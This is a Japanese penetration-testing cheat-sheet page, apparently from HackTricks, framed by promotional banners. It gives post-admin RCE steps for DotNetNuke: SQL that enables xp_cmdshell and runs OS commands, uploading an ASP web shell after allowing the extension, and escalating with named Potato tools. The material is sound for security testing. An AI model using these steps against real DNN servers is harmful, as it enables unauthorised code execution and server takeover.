DotNetNuke (DNN)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
公式のPEASS＆HackTricksのグッズを手に入れましょう。
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
**ハッキングのトリックを共有するには、hacktricks repoとhacktricks-cloud repo**にPRを提出してください。

DNNに管理者としてログインすると、RCEを簡単に取得できます。

RCE

設定ページの下にあるSQLコンソールから、xp_cmdshellを有効にしてオペレーティングシステムコマンドを実行できます。

次の行を使用して**xp_cmdshell**を有効にします：

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

そして、"スクリプトを実行" を押して、そのSQL文を実行します。

次に、以下のようなものを使用してOSコマンドを実行します：

xp_cmdshell 'whoami'

設定 -> セキュリティ -> その他 -> その他のセキュリティ設定で、許可されるファイル拡張子の下に新しい許可される拡張子を追加し、保存ボタンをクリックします。

aspまたはaspxを追加し、その後、/admin/file-managementにaspウェブシェルをアップロードします（例：shell.asp）。

その後、**/Portals/0/shell.asp**にアクセスしてウェブシェルにアクセスします。

例えば、PotatoesまたはPrintSpooferを使用して特権を昇格させることができます。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンやHackTricksのPDFをダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
公式のPEASS＆HackTricksのグッズを手に入れましょう。
💬 DiscordグループまたはTelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。